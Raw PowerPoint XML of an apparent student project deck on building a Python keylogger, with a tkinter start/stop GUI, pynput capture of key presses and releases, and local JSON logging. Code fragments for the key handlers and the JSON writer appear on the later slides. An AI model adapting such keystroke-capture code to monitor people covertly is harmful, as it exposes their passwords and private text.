              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
                <a:cs typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34"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Algorithm &amp; Deployment  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34"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Result </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Conclusion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Future Scope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References</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821319179"/>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Problem Statement</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="all" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Demi" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="581192" y="323232"/>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lvl="1" marL="629412" indent="-305435" algn="l">
              <a:lnSpc>
                <a:spcPct val="10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374151"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The keylogger program is a simple script that records all the keystrokes made on the user's keyboard and saves them in a text file. However, the program has some limitations, such as the inability to differentiate between key presses and key releases, and the lack of a graphical user interface (GUI) for easy start and stop of the keylogger.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22647715"/>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Proposed Solution</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="40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1" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="909017" y="233938"/>
            <a:ext cx="11613485" cy="5563973"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr" anchorCtr="0">
            <a:prstTxWarp prst="textNoShape"/>
          </a:bodyPr>
          <a:lstStyle/>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374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>To overcome the limitations of the existing keylogger program, we propose to develop a new keylogger with the following features:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875"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Tx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Improved keylogging functionality: The new keylogger will be able to differentiate between key presses and key releases and record them separately.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875"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Tx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>GUI for easy start and stop of the keylogger: The new keylogger will have a GUI that allows the user to start and stop the keylogger with a single click.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875"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Tx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>JSON file generation: The new keylogger will generate a JSON file that contains the keylogging data, making it easier to analyze and visualize the data.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>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454045827"/>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2" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="581192" y="662572"/>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System  Approach</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="all" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Calibri Light" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Calibri Light" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43"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1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="0F0F0F"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="581192" y="1145611"/>
            <a:ext cx="11791686" cy="3787649"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" lIns="0" tIns="198375" rIns="0" bIns="198375" anchor="ctr" anchorCtr="0">
            <a:prstTxWarp prst="textNoShape"/>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>The following is the development approach for the new keylogger:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100" b="1"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eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>Design the GUI: Create a simple GUI using </a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t> that includes a start and stop button.</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>Implement the keylogger functionality: Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="ui-monospace" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t> library to capture the key presses and releases.</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>Implement JSON file generation: Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="ui-monospace" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t> library to generate a JSON file that contains the</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t> keylogging data.</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>Integrate the keylogger functionality with the GUI: Connect the GUI buttons to the keylogger functionality.</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>Test the keylogger: Test the keylogger on different systems and scenarios to ensure its functionality.</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Franklin Gothic Book" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1767128162"/>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5"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6" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="380989" y="477168"/>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374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="47" name="图片"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1767592" y="2813831"/>
            <a:ext cx="8087854" cy="1524213"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="805346547"/>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9" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="218429" y="-431231"/>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374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Create GUI</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="50" name="图片"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="581192" y="1745289"/>
            <a:ext cx="10955278" cy="4667901"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="648773296"/>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1"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52" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="296711" y="-427071"/>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374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>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
        <p:nvSpPr>
          <p:cNvPr id="53" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3535680" y="1640839"/>
            <a:ext cx="5608320" cy="563231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Initialize the variables</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keys_used</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 []</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flag = False</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keys = ""</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Define the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on_press</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function</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def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on_press</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global flag,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keys_used</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keys</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if flag == False:</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keys_used.append</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{'Pressed': f'{key}'}</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flag = True</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if flag == True:</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keys_used.append</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{'Held': f'{key}'}</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429632531"/>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4"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55" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="296711" y="-427071"/>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374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="__Inter_aaf875" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>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
        <p:nvSpPr>
          <p:cNvPr id="56" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3535680" y="1640839"/>
            <a:ext cx="5608320" cy="507831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Define the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on_release</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function</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def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on_release</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global flag,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keys_used</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keys</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keys_used.append</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{'Released': f'{key}'}</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if flag == True:</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flag = False</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keys = keys + str(key)</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Define the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generate_json_file</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function</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def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generate_json_file</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keys_used</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with open('</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key_log.json</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wb</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as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key_log</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key_list_bytes</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json.dumps</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keys_used</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).encode()</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key_log.write</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key_list_bytes</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702934059"/>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0</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root</cp:lastModifiedBy>
  <cp:revision>25</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-26T16:50:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-04T13:44:59Z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ies>
</file>